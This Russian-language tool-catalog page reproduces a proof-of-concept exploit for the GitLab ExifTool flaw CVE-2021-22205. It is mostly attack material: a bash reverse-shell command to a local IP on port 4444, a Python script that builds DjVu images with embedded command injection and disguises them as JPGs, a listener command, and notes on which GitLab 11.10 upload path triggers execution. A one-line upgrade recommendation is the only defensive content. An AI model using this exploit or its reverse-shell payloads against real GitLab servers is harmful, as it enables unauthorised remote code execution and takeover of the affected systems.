Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
Инструменты/GitHubGitHub/shang159/cve-2021-22205-getshell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Репозиторий
314 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Тестовая версия

Создание команды для эксплуатации уязвимости

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

Создание изображения для эксплуатации с помощью djvumake

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1
Скачать инструмент

Локальное прослушивание порта 4444 в ожидании обратной оболочки

root@kitploit:~
nv -lv 192.168.147.5 4444

Загрузка изображений в GitLab по отдельности

  • Здесь есть отличие от эксплойтов в сети: многие эксплойты используют GitLab версии 12 или 13, точка загрузки — создание нового Snippets, путь: /uploads/user
  • У меня версия 11.10.0, использование публичного пути загрузки /uploads/user даёт 404, использование пути загрузки Snippets /uploads/personal_snippet не приводит к выполнению команды
  • В итоге загрузка изображения через страницу создания issue позволила успешно выполнить команду

Успешное получение обратной оболочки и доступа к целевой машине

После загрузки трёх изображений третье выполняет команду обратной оболочки, получаем доступ к целевой машине

Рекомендации по исправлению

Немедленно обновить GitLab до последней безопасной версии.